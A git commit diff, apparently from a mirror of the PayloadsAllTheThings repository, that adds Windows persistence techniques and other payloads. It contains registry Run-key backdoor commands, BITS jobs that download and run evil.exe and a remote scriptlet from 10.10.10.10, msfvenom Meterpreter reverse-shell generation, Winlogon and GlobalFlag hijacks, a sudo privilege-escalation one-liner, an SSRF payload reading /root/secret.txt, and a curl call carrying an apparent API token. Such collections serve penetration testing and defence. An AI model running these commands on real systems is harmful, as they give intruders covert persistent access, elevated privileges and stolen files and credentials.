mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Windows Persistence
This commit is contained in:
parent
137333cef6
commit
71ddb449ce
@ -16,6 +16,7 @@
|
||||
- [Twitter API Secret](#twitter-api-secret)
|
||||
- [Twitter Bearer Token](#twitter-bearer-token)
|
||||
- [Gitlab Personal Access Token](#gitlab-personal-access-token)
|
||||
- [HockeyApp API Token](#hockeyapp-api-token)
|
||||
- [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key)
|
||||
|
||||
|
||||
@ -98,6 +99,13 @@ curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_toke
|
||||
```
|
||||
|
||||
|
||||
### HockeyApp API Token
|
||||
|
||||
```powershell
|
||||
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4
|
||||
```
|
||||
|
||||
|
||||
### Auth Bypass using pre-published Machine Key
|
||||
|
||||
> By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token
|
||||
@ -126,3 +134,4 @@ $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
|
||||
* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
|
||||
* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
|
||||
* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/)
|
||||
* [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/)
|
@ -470,6 +470,7 @@ Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/maste
|
||||
|
||||
# If you have a full TTY, you can exploit it like this
|
||||
sudo -u#-1 /bin/bash
|
||||
sudo -u#4294967295 id
|
||||
```
|
||||
|
||||
## GTFOBins
|
||||
|
@ -6,14 +6,17 @@
|
||||
* [Disable Windows Defender](#disable-windows-defender)
|
||||
* [Disable Windows Firewall](#disable-windows-firewall)
|
||||
* [Userland](#userland)
|
||||
* [Registry](#registry)
|
||||
* [Registry HKCU](#registry-hkcu)
|
||||
* [Startup](#startup)
|
||||
* [Scheduled Task](#scheduled-task)
|
||||
* [BITS Jobs](#bits-jobs)
|
||||
* [Serviceland](#serviceland)
|
||||
* [IIS](#iis)
|
||||
* [Windows Service](#windows-service)
|
||||
* [Elevated](#elevated)
|
||||
* [HKLM](#hklm)
|
||||
* [Registry HKLM](#registry-hklm)
|
||||
* [Winlogon Helper DLL](#)
|
||||
* [GlobalFlag](#)
|
||||
* [Services](#services)
|
||||
* [Scheduled Task](#scheduled-task)
|
||||
* [Binary Replacement](#binary-replacement)
|
||||
@ -65,6 +68,15 @@ Value name: Backdoor
|
||||
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
|
||||
```
|
||||
|
||||
Using the command line
|
||||
|
||||
```powershell
|
||||
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
|
||||
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
|
||||
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
|
||||
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
|
||||
```
|
||||
|
||||
Using SharPersist
|
||||
|
||||
```powershell
|
||||
@ -110,6 +122,23 @@ SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som
|
||||
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
|
||||
```
|
||||
|
||||
|
||||
### BITS Jobs
|
||||
|
||||
```powershell
|
||||
bitsadmin /create backdoor
|
||||
bitsadmin /addfile backdoor "http://10.10.10.10/evil.exe" "C:\tmp\evil.exe"
|
||||
|
||||
# v1
|
||||
bitsadmin /SetNotifyCmdLine backdoor C:\tmp\evil.exe NUL
|
||||
bitsadmin /SetMinRetryDelay "backdoor" 60
|
||||
bitsadmin /resume backdoor
|
||||
|
||||
# v2 - exploit/multi/script/web_delivery
|
||||
bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll"
|
||||
bitsadmin /resume backdoor
|
||||
```
|
||||
|
||||
## Serviceland
|
||||
|
||||
### IIS
|
||||
@ -132,7 +161,7 @@ SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som
|
||||
|
||||
## Elevated
|
||||
|
||||
### HKLM
|
||||
### Registry HKLM
|
||||
|
||||
Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.
|
||||
|
||||
@ -141,6 +170,41 @@ Value name: Backdoor
|
||||
Value data: C:\Windows\Temp\backdoor.exe
|
||||
```
|
||||
|
||||
Using the command line
|
||||
|
||||
```powershell
|
||||
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
|
||||
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
|
||||
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
|
||||
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
|
||||
```
|
||||
|
||||
#### Winlogon Helper DLL
|
||||
|
||||
> Run executable during Windows logon
|
||||
|
||||
```powershell
|
||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evilbinary.exe
|
||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evilbinary.dll
|
||||
|
||||
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, evilbinary.exe" /f
|
||||
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, evilbinary.exe" /f
|
||||
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, evilbinary.exe" -Force
|
||||
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, evilbinary.exe" -Force
|
||||
```
|
||||
|
||||
|
||||
#### GlobalFlag
|
||||
|
||||
> Run executable after notepad is killed
|
||||
|
||||
```powershell
|
||||
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
|
||||
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
|
||||
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"
|
||||
```
|
||||
|
||||
|
||||
### Services
|
||||
|
||||
Create a service that will start automatically or on-demand.
|
||||
@ -176,6 +240,8 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
||||
| Display Switcher | C:\Windows\System32\DisplaySwitch.exe |
|
||||
| App Switcher | C:\Windows\System32\AtBroker.exe |
|
||||
|
||||
In Metasploit : `use post/windows/manage/sticky_keys`
|
||||
|
||||
#### Binary Replacement on Windows 10+
|
||||
|
||||
Exploit a DLL hijacking vulnerability in the On-Screen Keyboard **osk.exe** executable.
|
||||
@ -218,3 +284,8 @@ Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administr
|
||||
* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo)
|
||||
* [IIS Raid – Backdooring IIS Using Native Modules - 19/02/2020](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/)
|
||||
* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html)
|
||||
* [Persistence - Checklist - @netbiosX](https://github.com/netbiosX/Checklists/blob/master/Persistence.md)
|
||||
* [Persistence – Winlogon Helper DLL - @netbiosX](https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/)
|
||||
* [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/)
|
||||
* [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)
|
||||
* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/)
|
@ -407,6 +407,14 @@ gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-
|
||||
gopher://127.0.0.1:6379/_save
|
||||
```
|
||||
|
||||
## SSRF exploiting PDF file
|
||||
|
||||
Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c&feature=emb_title)
|
||||
|
||||
```powershell
|
||||
<link rel=attachment href="file:///root/secret.txt">
|
||||
```
|
||||
|
||||
## SSRF to XSS
|
||||
|
||||
by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
|
||||
|
Loading…
Reference in New Issue
Block a user